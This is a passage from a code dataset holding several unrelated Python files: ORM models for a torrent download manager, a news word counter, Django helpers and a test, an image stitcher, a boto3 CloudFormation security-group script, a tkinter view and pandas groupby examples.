__lt__(self, other):\n        return _lt_from_attrs(self, other, ('name',))\n\n    def __repr__(self):\n        return \"\".format(\n            id=self.id or '??',\n            oid=id(self),\n            fmt=self.format())\n\n    def __str__(self):\n        return self.format()\n\n    def __hash__(self):\n        return hash(self.uri)\n\n    @orm.validates('name', 'provider', 'urn', 'uri', 'language', 'type')\n    def validate(self, key, value):\n        \"\"\"\n        Wrapper around static method normalize\n        \"\"\"\n        return self.normalize(key, value)\n\n    @staticmethod\n    def normalize(key, value):\n        def _normalize():\n            nonlocal key\n            nonlocal value\n\n            # Those keys must be non-empty strings\n            if key in ['name', 'provider', 'urn', 'uri']:\n                if value == '':\n                    raise ValueError()\n\n                return str(value)\n\n            # Those keys must be an integer (not None)\n            elif key in ['created', 'last_seen']:\n                return int(value)\n\n            # Those keys must be an integer or None\n            elif key in ['size', 'seeds', 'leechers']:\n                if value is None:\n                    return None\n\n                return int(value)\n\n            # language must be in the form xxx-xx or None\n            elif key == 'language':\n                if value is None:\n                    return None\n\n                value = str(value)\n\n                if not re.match(r'^...(\\-..)?$', value):\n                    raise ValueError()\n\n                return value\n\n            # 
type is limited to some strings or None\n            elif key == 'type':\n                if value is None:\n                    return None\n\n                value = str(value)\n\n                if value in (\n                        'application',\n                        'book',\n                        'episode',\n                        'game',\n                        'movie',\n                        'music',\n                        'other',\n                        'xxx'):\n                    return value\n\n                raise ValueError()\n\n            else:\n                raise KeyError()\n\n        # Wrap the whole process for easy exception handling\n        try:\n            return _normalize()\n\n        except TypeError as e:\n            msg = 'invalid type for {key}: {type}'\n            msg = msg.format(key=key, type=type(value))\n            raise TypeError(msg) from e\n\n        except ValueError as e:\n            msg = 'invalid value for {key}: {value}'\n            msg = msg.format(key=key, value=repr(value))\n            raise ValueError(msg) from e\n\n    @hybrid_property\n    def entity(self):\n        return _entity_getter(self)\n\n    @entity.setter\n    def entity(self, entity):\n        _entity_setter(self, entity)\n\n    @property\n    def age(self):\n        return utils.now_timestamp() - self.timestamp\n\n    @property\n    def needs_postprocessing(self):\n        return self.urn is None and self.uri is not None\n\n    @property\n    def ratio(self):\n        seeds = self.seeds if self.seeds is not None else 0\n        leechers = self.leechers if self.leechers is not None else 0\n\n        if not self.seeds and not self.leechers:\n            return None\n\n        if seeds and leechers == 0:\n            return float(sys.maxsize)\n\n        if seeds == 0 and leechers:\n            return 0.0\n\n        return seeds / leechers\n\n    @property\n    def selected(self):\n        return (\n            self.entity and\n            self.entity.selection and\n            self.entity.selection.source == self)\n\n    @property\n    def urn(self):\n        if self.uri.startswith('http'):\n            return None\n\n        qs = parse.urlparse(self.uri).query\n        try:\n            urn = parse.parse_qs(qs)['xt'][-1]\n        except KeyError:\n            return None\n        urn = bittorrentlib.normalize_urn(urn)\n        # str.lstrip() strips a set of characters, not a prefix; remove the\n        # 'urn:' prefix explicitly instead\n        if urn.startswith('urn:'):\n            urn = urn[len('urn:'):]\n        return urn\n\n    def asdict(self):\n        return _asdict_from_attrs(\n            self, (\n                'age',\n                'entity',\n                'episode',\n                'episode_id',\n                'id',\n                'language',\n                'leechers',\n                'movie',\n                'movie_id',\n                'name',\n                'provider',\n                'ratio',\n                'seeds',\n                'size',\n                'tags',\n                'timestamp',\n                'type',\n                'uri',\n                'urn'))\n\n    def format(self, fmt='{name}', extra_data={}):\n        data = self.asdict()\n        data['seeds'] = data.get('seeds', '-')\n        data['leechers'] = data.get('leechers', '-')\n        data['language'] = data.get('language', 'unknown')\n        data.update(extra_data)\n\n        return fmt.format(**data)\n\n\n# @event.listens_for(Source.tags, 'dispose_collection')\n# @event.listens_for(Source.tags, 'init_collection')\n# @event.listens_for(Source.tags, 'remove')\n# def _source_tags_modifier_cb(target, *args):\n#     target.tags_map = {tag.key: tag.value for tag in target.tags}\n\n\n# class SourceTag(sautils.KeyValueItem, sautils.Base):\n#     __tablename__ = 'sourcetag'\n#     __table_args__ = (\n#         schema.UniqueConstraint('source_id', 'key'),\n#     )\n\n#     source_id = Column(Integer, ForeignKey('source.id', ondelete=\"cascade\"))\n#     source = orm.relationship(\"Source\", back_populates=\"tags\", uselist=False)\n\n\n# class Selection(sautils.Base):\n#     __tablename__ = 'selection'\n#     __mapper_args__ = {\n#         'polymorphic_on': 'type'\n#     }\n\n#     id = Column(Integer, primary_key=True)\n#     type = Column(String(50))\n#     source_id = Column(Integer,\n#                        ForeignKey('source.id', ondelete=\"cascade\"),\n#                        nullable=False)\n#     source = orm.relationship('Source')\n\n#     @hybrid_property\n#     def entity(self):\n#         return _entity_getter(self)\n\n#     @entity.setter\n#     def entity(self, entity):\n#         _entity_setter(self, entity)\n\n\n# class EpisodeSelection(Selection):\n#     __mapper_args__ = {\n#         'polymorphic_identity': 'episode'\n#     }\n\n#     episode_id = Column(Integer,\n#                         
ForeignKey('episode.id', ondelete=\"CASCADE\"),\n# nullable=True)\n# episode = orm.relationship(\"Episode\",\n# backref=orm.backref(\"selection\",\n# cascade=\"all, delete\",\n# uselist=False))\n\n# def __repr__(self):\n# fmt = ' source:{source}'\n# return fmt.format(\n# id=self.id,\n# episode=repr(self.episode),\n# source=repr(self.source))\n\n\n# class MovieSelection(Selection):\n# __mapper_args__ = {\n# 'polymorphic_identity': 'movie'\n# }\n\n# movie_id = Column(Integer,\n# ForeignKey('movie.id', ondelete=\"CASCADE\"),\n# nullable=True)\n# movie = orm.relationship(\"Movie\",\n# backref=orm.backref(\"selection\",\n# cascade=\"all, delete\",\n# uselist=False))\n\n# def __repr__(self):\n# fmt = ' source:{source}'\n# return fmt.format(\n# id=self.id,\n# movie=repr(self.movie),\n# source=repr(self.source))\n\n\nclass Episode(sautils.Base):\n __tablename__ = 'episode'\n __table_args__ = (\n schema.UniqueConstraint('series', 'modifier', 'season', 'number'),\n )\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n series = Column(String, nullable=False)\n modifier = Column(String, nullable=False, default='')\n season = Column(Integer, nullable=False)\n number = Column(Integer, nullable=False)\n\n # SELECTION_MODEL = EpisodeSelection\n\n def __init__(self, *args, modifier='', **kwargs):\n attrs = (\n 'series',\n 'season',\n 'number'\n )\n _init_check_required(kwargs, attrs)\n super().__init__(*args, modifier=modifier, **kwargs)\n\n def __eq__(self, other):\n attrs = (\n 'series',\n 'modifier',\n 'season',\n 'number'\n )\n return _eq_from_attrs(self, other, attrs)\n\n def __lt__(self, other):\n attrs = (\n 'series',\n 'modifier'\n 'season',\n 'number'\n )\n return _lt_from_attrs(self, other, attrs)\n\n def __repr__(self):\n return \"\".format(\n id=self.id or '??',\n oid=id(self),\n fmt=self.format())\n\n def __str__(self):\n return self.__unicode__()\n\n def __unicode__(self):\n return self.format()\n\n @orm.validates(\n 'series',\n 'modifier',\n 'season',\n 'number'\n )\n def validate(self, key, value):\n return self.normalize(key, value)\n\n @classmethod\n def normalize(cls, key, value):\n if key == 'series':\n value = value.lower()\n if not value:\n raise ValueError(value)\n\n elif key == 'modifier':\n value = str(value) if value is not None else ''\n\n elif key in ['season', 'number']:\n value = int(value)\n if value < 0:\n raise ValueError(value)\n\n else:\n raise NotImplementedError(key)\n\n return value\n\n def asdict(self):\n attrs = (\n 'series',\n 'modifier',\n 'season',\n 'number',\n )\n return _asdict_from_attrs(self, attrs)\n\n def format(self, fmt='{series_with_mod} s{season:02d} e{number:02d}',\n extra_data={}):\n d = self.asdict()\n\n if self.modifier:\n series_with_mod = \"{series} ({modifier})\"\n else:\n series_with_mod = \"{series}\"\n\n d['series_with_mod'] = series_with_mod.format(**d)\n d.update(**extra_data)\n\n try:\n return fmt.format(**d)\n except TypeError:\n pass\n\n\nclass Movie(sautils.Base):\n __tablename__ = 'movie'\n __table_args__ = (\n schema.UniqueConstraint('title', 'modifier'),\n )\n\n id = Column(Integer, primary_key=True, autoincrement=True)\n title = Column(String, nullable=False)\n modifier = Column(String, nullable=False, default='')\n\n # SELECTION_MODEL = MovieSelection\n\n def __init__(self, *args, modifier='', **kwargs):\n attrs = (\n 'title',\n )\n _init_check_required(kwargs, attrs)\n super().__init__(*args, modifier=modifier, **kwargs)\n\n def __eq__(self, other):\n attrs = (\n 'title',\n 'modifier'\n )\n return _eq_from_attrs(self, 
other, attrs)\n\n def __lt__(self, other):\n attrs = (\n 'title',\n 'modifier'\n )\n return _lt_from_attrs(self, other, attrs)\n\n def __repr__(self):\n return \"\".format(\n id=self.id or '??',\n oid=id(self),\n fmt=self.format())\n\n def __str__(self):\n return self.__unicode__()\n\n def __unicode__(self):\n return self.format()\n\n @orm.validates(\n 'title',\n 'modifier'\n )\n def validate(self, key, value):\n return self.normalize(key, value)\n\n @classmethod\n def normalize(cls, key, value):\n if key == 'title':\n value = value.lower()\n if not value:\n raise ValueError(value)\n\n elif key == 'modifier':\n value = str(value) if value else ''\n\n else:\n raise NotImplementedError(key)\n\n return value\n\n def asdict(self):\n attrs = (\n 'title',\n 'modifier'\n )\n return _asdict_from_attrs(self, attrs)\n\n def format(self, fmt='{title_with_mod}', extra_data={}):\n d = self.asdict()\n\n if self.modifier:\n title_with_mod = \"{title} ({modifier})\"\n else:\n title_with_mod = \"{title}\"\n\n d['title_with_mod'] = title_with_mod.format(**d)\n d.update(**extra_data)\n\n return fmt.format(**d)\n\n\nclass Download(sautils.Base):\n __tablename__ = 'download'\n __table_args__ = (\n schema.UniqueConstraint('foreign_id'),\n )\n\n source_id = Column(Integer,\n ForeignKey(\"source.id\", ondelete=\"CASCADE\"),\n primary_key=True, nullable=False)\n source = orm.relationship(\"Source\",\n backref=orm.backref(\"download\",\n cascade=\"all, delete\",\n uselist=False))\n foreign_id = Column(String, nullable=False)\n state = Column(Integer, nullable=False)\n\n @classmethod\n def normalize(cls, key, value):\n if key in ('plugin', 'foreign_id'):\n if not isinstance(value, str):\n value = str(value)\n if value == '':\n raise ValueError(value)\n\n elif key == 'state':\n value = int(value)\n\n # valid_states = [\n # State.INITIALIZING,\n # State.QUEUED, State.PAUSED, State.DOWNLOADING,\n # State.SHARING, State.DONE, State.ARCHIVED]\n # if value not in valid_states:\n # raise ValueError(value)\n\n else:\n raise NotImplementedError(key)\n\n return value\n\n @orm.validates('plugin', 'foreign_id', 'state')\n def validate(self, key, value):\n return self.normalize(key, value)\n\n def __repr__(self):\n fmt = ''\n return fmt.format(id=id(self), state=self.state)\n # return fmt.format(id=id(self), state=STATE_SYMBOLS[self.state])\n\n# class Download(sautils.Base):\n# __tablename__ = 'download'\n\n# id = Column(Integer, primary_key=True)\n# state = Column(String(50))\n# type = Column(String(20))\n\n# __mapper_args__ = {\n# 'polymorphic_on': type,\n# # polymorphic_identity is not defined because this is an\n# # \"abstract base class\"\n# # 'polymorphic_identity': ''\n# }\n\n\n# class EpisodeDownload(Download):\n# __mapper_args__ = {\n# 'polymorphic_identity': 'episode'\n# }\n# episode_id = Column(Integer,\n# ForeignKey(Episode.id, ondelete=\"CASCADE\"),\n# nullable=True)\n# episode = orm.relationship(Episode,\n# uselist=False,\n# backref=orm.backref(\"download\",\n# uselist=False,\n# cascade_backrefs=False,\n# lazy='select'))\n\n\n# class MovieDownload(Download):\n# __mapper_args__ = {\n# 'polymorphic_identity': 'movie'\n# }\n\n# movie_id = Column(Integer,\n# ForeignKey(Movie.id, ondelete=\"CASCADE\"),\n# nullable=True)\n# movie = orm.relationship(Movie,\n# uselist=False,\n# backref=orm.backref(\"download\",\n# uselist=False,\n# cascade_backrefs=False,\n# lazy='select'))\n\n\ndef _init_check_required(kwargs, reqs):\n check = all([attr in kwargs for attr in reqs])\n\n if not check:\n err = (\"Insufficient arguments. 
\"\n \"Required: {req}, got: {got}\")\n err = err.format(req=', '.join(reqs),\n got=', '.join(kwargs.keys()))\n raise TypeError(err)\n\n\ndef _eq_from_attrs(a, b, attrs):\n if not isinstance(b, a.__class__):\n raise TypeError(b.__class__)\n\n try:\n return all([\n getattr(a, attr) == getattr(b, attr)\n for attr in attrs\n ])\n except AttributeError as e:\n raise TypeError(b) from e\n\n\ndef _lt_from_attrs(a, b, attrs):\n for attr in attrs:\n if not hasattr(a, attr):\n raise TypeError(a)\n\n if not hasattr(b, attr):\n raise TypeError(a)\n\n ret = getattr(a, attr).__lt__(getattr(b, attr))\n if ret != 0:\n return ret\n\n return 0\n\n\ndef _asdict_from_attrs(x, attrs):\n return {attr: getattr(x, attr, None) for attr in attrs}\n\n\ndef _entity_getter(x):\n entity_attrs = (\n 'episode',\n 'movie'\n )\n\n for attr in entity_attrs:\n value = getattr(x, attr, None)\n if value:\n return value\n\n return None\n\n\ndef _entity_setter(x, entity):\n entity_map = {\n Episode: 'episode',\n Movie: 'movie'\n }\n\n # Check for unknown entity type\n if entity is not None and entity.__class__ not in entity_map:\n raise TypeError(entity)\n\n # Set all entity-attributes correctly\n for (model, attr) in entity_map.items():\n value = entity if isinstance(entity, model) else None\n setattr(x, attr, value)\n","sub_path":"arroyo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":20749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"240017000","text":"# в python3 такая строчка обычно не нужна\n# но если у вас специфичные настройки компьютера\n# может пригодиться\n# -*- coding: UTF-8 -*-\nimport json\nimport xml.etree.ElementTree as eTree\n\n\n# Удаляем из текста все HTML тэги и спецсимволы, такие как :/\\'\" .,()\ndef remove_html_tags(text):\n while text.find('<') > -1:\n open_tag = text.find('<')\n close_tag = text.find('>')\n text = '{} {}'.format(text[:open_tag], text[close_tag + 1:])\n return text.replace('(', '').replace(')', '').replace('.', '').replace('\"', '').replace('\\'', '') \\\n .replace('\\\\', '').replace('/', '').replace(',', '').replace(';', '').replace(':', '')\n\n\n# Чтение файла JSON\ndef read_json(filename, encoding): # Чтение файла JSON\n with open(filename, encoding=encoding) as news:\n data = (json.load(news))\n articles = data['rss']['channel']['item'] # Список со статьями\n text = ''\n for article in articles:\n article_text = article['description']\n if isinstance(article_text, dict):\n article_text = article_text[\"__cdata\"]\n text += remove_html_tags(article_text)\n return text\n\n\n# Чтение файла XML\ndef read_xml(filename, encoding):\n parser = eTree.XMLParser(encoding=encoding)\n tree = eTree.parse(filename, parser)\n root = tree.getroot()\n text = ''\n for item in root.iter('item'):\n article = item.find('description')\n article_text = remove_html_tags(article.text)\n text += article_text\n return text\n\n\n# Вывод результатов в консоль\ndef print_results(filename, top_10):\n print('Топ-10 слов в файле {}'.format(filename))\n for word, count in top_10:\n print('{:20}: {} раз '.format(word, count))\n print('-' * 30)\n\n\n# Получение списка файлов и их обработка\ndef get_files(files, func):\n for file in files:\n text = func(file['filename'], file['encoding'])\n words = text.split()\n words_count = {}\n for word in words:\n if len(word) > 6:\n words_count[word] = words_count.get(word, 0) + 1\n top_10 = sorted(words_count.items(), key=lambda x: x[1], reverse=True)[:10]\n print_results(file['filename'], 
top_10)\n\n\nfiles_json = [\n    {'filename': 'newsafr.json', 'encoding': \"utf8\"},\n    {'filename': 'newsfr.json', 'encoding': \"iso8859_5\"},\n    {'filename': 'newscy.json', 'encoding': \"koi8-r\"},\n    {'filename': 'newsit.json', 'encoding': \"cp1251\"}\n]\nfiles_xml = [\n    {'filename': 'newsafr.xml', 'encoding': \"cp1251\"},\n    {'filename': 'newsfr.xml', 'encoding': \"iso8859_5\"},\n    {'filename': 'newscy.xml', 'encoding': \"koi8-r\"},\n    {'filename': 'newsit.xml', 'encoding': \"cp1251\"}\n]\n\nprint('This program prints the Top 10 most frequent words in XML or JSON files')\nwhile True:\n    print('Enter:\\n'\n          '1 - to print the Top 10 words from the JSON files\\n'\n          '2 - to print the Top 10 words from the XML files\\n'\n          '0 - to exit the program')\n    choice = input()\n    if choice == '1':\n        get_files(files_json, read_json)\n        continue\n    elif choice == '2':\n        get_files(files_xml, read_xml)\n        continue\n    elif choice == '0':\n        break\n    else:\n        print('Invalid option entered')\n        continue\n","sub_path":"newsparser.py","file_name":"newsparser.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"281559440","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSMS.context_processors\n\nModule contains get_user_info function for making global LOGGED_USER\nvariable in all templates.\n\n:copyright: (c) 2015 by Oleksii Omelchuk.\n:license: BSD.\n\"\"\"\n\nfrom django.http import HttpRequest\n\nfrom apps.mainteacher.models.teachers import Teachers\n\n\ndef get_user_info(request):\n    \"\"\"Make global template variable LOGGED_USER\n    from session user_id.\n    \"\"\"\n    try:\n        logged_user = Teachers.objects.get(pk=request.session['teacher_id'])\n    except KeyError:\n        logged_user = None\n\n    return {'LOGGED_USER': logged_user}\n","sub_path":"SMS/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95384342","text":"import sys\nimport os\nimport math\nfrom PIL import Image \nfrom PIL import ImageDraw\nfrom PIL import ImageFilter\n\nif __name__ == '__main__':\n    args = sys.argv\n    faces = ( \"x+\", \"x-\", \"y+\", \"y-\", \"z+\", \"z-\" )\n    out_width = 1024\n    start_x = 0\n    img = Image.new('RGBA', [out_width*6, out_width], (0x00,0x00,0x00,0xff))\n    for face in faces:\n        srcimg = Image.open(face+\".png\", 'r')\n        resized_img = srcimg.resize((out_width, out_width))\n        clipboard = resized_img.crop((0, 0, out_width, out_width))\n        img.paste(clipboard, (start_x, 0, start_x + out_width, out_width))\n        start_x += out_width\n    #end\n\n    outdir = \".\"\n    outpath = outdir + '/skybox.png'\n    img.save(outpath)\n#EOF\n","sub_path":"Tools/stitch2.py","file_name":"stitch2.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"445723425","text":"import os\nfrom django.test import TestCase\nfrom corehq.apps.app_manager.const import APP_V2\nfrom corehq.apps.app_manager.models import Application, Module\nfrom corehq.apps.userreports.dbaccessors import delete_all_report_configs\nfrom corehq.apps.userreports.models import DataSourceConfiguration\nfrom corehq.apps.userreports.reports.builder.forms import ConfigureListReportForm\n\n\ndef read(rel_path):\n    path = os.path.join(os.path.dirname(__file__), *rel_path)\n    with open(path) as f:\n        return f.read()\n\n\nclass ReportBuilderTest(TestCase):\n\n    @classmethod\n    def setUpClass(cls):\n        cls.app = 
Application.new_app('domain', 'Untitled Application', application_version=APP_V2)\n        module = cls.app.add_module(Module.new_module('Untitled Module', None))\n        cls.form = cls.app.new_form(module.id, \"Untitled Form\", 'en', read(['data', 'forms', 'simple.xml']))\n        cls.app.save()\n\n    @classmethod\n    def tearDownClass(cls):\n        cls.app.delete()\n        for config in DataSourceConfiguration.all():\n            config.delete()\n        delete_all_report_configs()\n\n    def test_updating_out_of_date_report(self):\n        \"\"\"\n        Test that editing a report for an outdated data source creates a new data source.\n        Data sources are tied to app version.\n        \"\"\"\n\n        # Make report\n        builder_form = ConfigureListReportForm(\n            \"Test Report\",\n            self.app._id,\n            \"form\",\n            self.form.unique_id,\n            existing_report=None,\n            data={\n                'filters': '[]',\n                'columns': '[{\"property\": \"/data/first_name\", \"display_text\": \"first name\"}]',\n            }\n        )\n        self.assertTrue(builder_form.is_valid())\n        report = builder_form.create_report()\n        first_data_source_id = report.config_id\n\n        # Bump version of app by saving it\n        self.app.save()\n\n        # Modify the report\n        builder_form = ConfigureListReportForm(\n            \"Test Report\",\n            self.app._id,\n            \"form\",\n            self.form.unique_id,\n            existing_report=report,\n            data={\n                'filters': '[]',\n                'columns': '[{\"property\": \"/data/first_name\", \"display_text\": \"first name\"}]',\n            }\n        )\n        self.assertTrue(builder_form.is_valid())\n        report = builder_form.update_report()\n        second_data_source_id = report.config_id\n\n        self.assertNotEqual(first_data_source_id, second_data_source_id)\n","sub_path":"corehq/apps/userreports/tests/test_report_builder.py","file_name":"test_report_builder.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"492981755","text":"import boto3\nimport sys\nimport os\nimport time\nfrom texttable import Texttable\n\n# bcolors was referenced below but never defined; minimal ANSI codes so the script runs\nclass bcolors:\n\tWARNING = '\\033[93m'\n\tENDC = '\\033[0m'\n\ndef SG_Intuit_CIDR_SSH(profilename):\n\t#print(\"SG_Intuit_CIDR_SSH\")\n\t#client = boto3.client('cloudformation')\n\tif profilename:\n\t\tProfile_Session = boto3.session.Session(profile_name=profilename)\n\t\tclient = Profile_Session.client('cloudformation')\n\t\tProfilename = Profile_Session.profile_name\n\telse:\n\t\tprint(bcolors.WARNING,\"Profile argument is not given and Currently you are not logged into any profile, hence can't proceed and exiting the script\",bcolors.ENDC)\n\t\tsys.exit()\n\ttry:\n\t\tresponse = client.create_stack(\n\t\t    StackName='intuit-cidr-ingress-tcp-22',\n\t\t    TemplateURL='https://s3-us-west-2.amazonaws.com/286056532910-scripts/intuit-cidr-ingress.yml',\n\t\t    Parameters=[\n\t\t        {\n\t\t            'ParameterKey': 'Name',\n\t\t            'ParameterValue': 'intuit-cidr-ingress',\n\t\t        },\n\t\t        {\n\t\t            'ParameterKey': 'Port',\n\t\t            'ParameterValue': '22',\n\t\t        },\n\t\t        {\n\t\t            'ParameterKey': 'VpcId',\n\t\t            'ParameterValue': 'vpc-73703315',\n\t\t        },\n\t\t    ],\n\t\t)\n\t\t#print(response)\n\texcept Exception as error:\n\t\tprint('intuit-cidr-ingress-tcp-22',\" Stack is not created for the following reason\")\n\t\tprint(error)\n\t\tprint(\"\\n\")\n\t\tdelete = input(\"Do you like to Delete this existing Stack (y/N) : \")\n\t\tif delete == 'y' or delete == 'Y':\n\t\t\tdelete_stack(\"intuit-cidr-ingress-tcp-22\",profilename)\n\t\tsys.exit()\n\tprint(\"Stack with Name \\\"intuit-cidr-ingress-tcp-22\\\" is created\",)\n\tmonitor_stack('intuit-cidr-ingress-tcp-22',profilename)\n\n\ndef SG_Intuit_CIDR_HTTP():\n\tprint(\"SG_Intuit_CIDR_HTTP\")\n\ndef SG_Intuit_CIDR_HTTPS():\n\tprint(\"SG_Intuit_CIDR_HTTPS\")\n\ndef 
SG_Intuit_APIGW_CIDR_HTTPS():\n\tprint(\"SG_Intuit_APIGW_CIDR_HTTPS\")\n\ndef monitor_stack(Stack_Name,profilename):\n\tif profilename:\n\t\tProfile_Session = boto3.session.Session(profile_name=profilename)\n\t\tclient = Profile_Session.client('cloudformation')\n\t\tProfilename = Profile_Session.profile_name\n\telse:\n\t\tprint(bcolors.WARNING,\"Profile argument is not given and Currently you are not logged into any profile, hence can't proceed and exiting the script\",bcolors.ENDC)\n\t\tsys.exit()\n\ttry:\n\t\twhile True:\n\t\t\tresponse = client.describe_stack_events(\n\t\t\t\tStackName=Stack_Name,\n\t\t\t)\n\t\t\tList = []\n\t\t\tList = [['Stack_Id', 'Stack_Name', 'Resource_Status', 'Resource_Status_Reason']]\n\t\t\tprint(response['StackEvents'][0]['ResourceStatus'])\n\t\t\tList.append([response['StackEvents'][0]['StackId'],response['StackEvents'][0]['StackName'], response['StackEvents'][0]['ResourceStatus'], response['StackEvents'][0]['ResourceStatusReason']])\n\t\t\tt = Texttable()\n\t\t\tt.add_rows(List)\n\t\t\tprint(t.draw())\n\t\t\tresp = client.describe_stacks(\n\t\t\t\tStackName=Stack_Name,\n\t\t\t)\n\t\t\tStackStatus = resp['Stacks'][0]['StackStatus']\n\t\t\tif StackStatus == 'ROLLBACK_COMPLETE' or StackStatus == 'CREATE_FAILED' or StackStatus == 'CREATE_COMPLETE':\n\t\t\t\tprint(\"Current status of the Stack is \",StackStatus)\n\t\t\t\t# stop polling once the stack reaches a terminal state\n\t\t\t\tbreak\n\texcept Exception as error:\n\t\tprint(error)\n\n\ndef delete_stack(Stack_Name,profilename):\n\tif Stack_Name == '':\n\t\tStack_Name = input(\"Enter the Stack Name : \")\n\tif profilename:\n\t\tProfile_Session = boto3.session.Session(profile_name=profilename)\n\t\tclient = Profile_Session.client('cloudformation')\n\t\tProfilename = Profile_Session.profile_name\n\telse:\n\t\tprint(bcolors.WARNING,\"Profile argument is not given and Currently you are not logged into any profile, hence can't proceed and exiting the script\",bcolors.ENDC)\n\t\tsys.exit()\n\ttry:\t\n\t\tresponse = client.delete_stack(\n\t\t    StackName=Stack_Name\n\t\t)\n\t\tprint(Stack_Name,\" is deleted successfully\")\n\texcept Exception as error:\n\t\tprint(error)\n\t\tprint(\"Unable to delete stack - \",Stack_Name)\n\ndef main():\n\tProfile = sys.argv[1]\n\twhile True:\t\n#\t\tos.system('clear')\n\t\tprint(\"1. Create Stack - Security Group with Intuit CIDR for SSH\")\n\t\tprint(\"2. Create Stack - Security Group with Intuit CIDR for HTTP\")\n\t\tprint(\"3. Create Stack - Security Group with Intuit CIDR for HTTPS\")\n\t\tprint(\"4. Create Stack - Security Group with Intuit API GW CIDR for HTTPS\")\n\t\tprint(\"5. Delete Stack of your Choice\")\n\t\tprint(\"6. 
Exit\")\n\t\tprint(\"\\n\")\n\t\tchoice = input(\"Enter Your Choice : \")\n\t\tif choice == '1':\n\t\t\tSG_Intuit_CIDR_SSH(Profile)\n\t\t\tbreak\n\t\telif choice == '2':\n\t\t\tSG_Intuit_CIDR_HTTP()\n\t\telif choice == '3':\n\t\t\tSG_Intuit_CIDR_HTTPS()\n\t\telif choice == '4':\n\t\t\tSG_Intuit_APIGW_CIDR_HTTPS()\n\t\telif choice == '5':\n\t\t\tdelete_stack('',Profile)\n\t\telif choice == '6':\n\t\t\tprint(\"Thank you for using the Script\")\n\t\t\tbreak\n\t\telse:\n\t\t\tprint(\"Wrong Choice\")\n\t\t\ttime.sleep('5')\n\t\t\tcontinue\n\n\nif __name__ == '__main__' :\n\ttry:\n\t\tmain()\n\texcept KeyboardInterrupt:\n\t\tprint('')\n\t\tprint('\\033[1m' + '\\nKeyboard Interruption..Calm Down')\n\t\tprint('\\033[1m' + '\\nExiting !!!!\\n')\n\t\tprint('\\033[0m')\n\t\tsys.exit()","sub_path":"boto3/scripts/Trigger_v1.0.py","file_name":"Trigger_v1.0.py","file_ext":"py","file_size_in_byte":4757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339285959","text":"import tkinter as tk\nimport collections\n\nimport View.ViewConfigs as sViewConfigs\nimport View.TkVariables as sVariables\nimport View.WidgetManager as sWidgetManager\n\nimport View.RootManager as mRootManager\nimport View.TextManager as mTextManager\nimport View.FileManager as mFileManager\nimport View.MessageManager as mMsgManager\nimport View.ManagerBus as mManagerBus\nimport View.MainFrameManager as mMainFrameManager\nimport View.ShortCutManager as mShortCutManager\nimport View.MenuManager as mMenuManager\n\nclass View():\n def __init__(self):\n self._variables = sVariables.TkVariables.getInstance()\n self._viewConfigs = sViewConfigs.ViewConfigs.getInstance()\n self._widgetManager = sWidgetManager.WidgetManager.getInstance()\n\n self._managers= collections.OrderedDict()\n\n def createWindow(self):\n self._createManagers()\n\n self._configTkVariables()\n self._configViewConfigs()\n self._configManagers()\n\n def _createManagers(self):\n self._managers[\"root\"] = mRootManager.RootManager()\n\n self._managers[\"bus\"] = mManagerBus.ManagerBus()\n\n self._managers[\"message\"] = mMsgManager.MessageManager()\n\n self._managers[\"file\"] = mFileManager.FileManager()\n\n self._managers[\"menu\"] = mMenuManager.MenuManager()\n\n self._managers[\"shortCut\"] = mShortCutManager.ShortCutManager()\n\n self._managers[\"mainFrame\"] = mMainFrameManager.MainFrameManager()\n\n self._managers[\"text\"] = mTextManager.TextManager(True)\n\n self._managers[\"output\"] = mTextManager.TextManager(False)\n\n def _configViewConfigs(self):\n self._viewConfigs.setConfigs(self._managers)\n\n def _configTkVariables(self):\n for name in (\"enableLineNum\", \"enableCursorInfo\", \"enableHighlightCurrentLine\"):\n self._variables.createInt(name)\n\n for name in (\"themes\",):\n self._variables.createString(name)\n\n def _configManagers(self):\n for k, v in self._managers.items():\n try:\n v.configure(self._managers)\n except:\n print(\"config error: {0}\".format(k))\n\n def showWindow(self):\n win = self._widgetManager.get(\"Root\")\n\n win.mainloop()\n","sub_path":"View/View.py","file_name":"View.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"27903185","text":"'''\npandas分组与聚合\n'''\nimport pandas as pd\nimport numpy as np\nsales = [{'account': 'Jones LLC','type':'a', 'Jan': 150, 'Feb': 200, 'Mar': 140},\n {'account': 'Alpha Co','type':'b', 'Jan': 200, 'Feb': 210, 'Mar': 215},\n {'account': 'Blue 
Inc','type':'a', 'Jan': 50, 'Feb': 90, 'Mar': 95 }]\ndf = pd.DataFrame(sales)\n# print(df.groupby('type').groups)\n# >>> {'b': Int64Index([1], dtype='int64'), 'a': Int64Index([0, 2], dtype='int64')}\n# for a,b in df.groupby('type'): # print the group info\n#     print(a)\n#     print(b)\n\n# res = df.groupby('type').aggregate({'type':'count', 'Feb':'sum'})\n# group by 'type' into groups a and b, use a and b as the row index, take the count of the grouped 'type' column as the first column and the sum of the 'Feb' column as the second column\n# print(res)\n# >>>:\n#       Feb  type\n# type\n# a     290     2\n# b     210     1\ngroup=['x','y','z']\ndata=pd.DataFrame({\n    \"group\":[group[x] for x in np.random.randint(0,len(group),10)] ,\n    \"salary\":np.random.randint(5,50,10),\n    \"age\":np.random.randint(15,50,10)\n    })\nprint(data)\n# res = data.groupby('group').agg('mean')  # group by 'group' and compute each group's mean age and salary\n# print(res)\n\n# res = data.groupby('group').mean().to_dict()  # equivalent to the above\n# print(res)\n\n# res = data.groupby('group').transform('mean')\n# print(res)\n\nres = pd.pivot_table(data,\n                     values='salary',\n                     columns='group',\n                     index='age',\n                     aggfunc='count',\n                     margins=True\n                     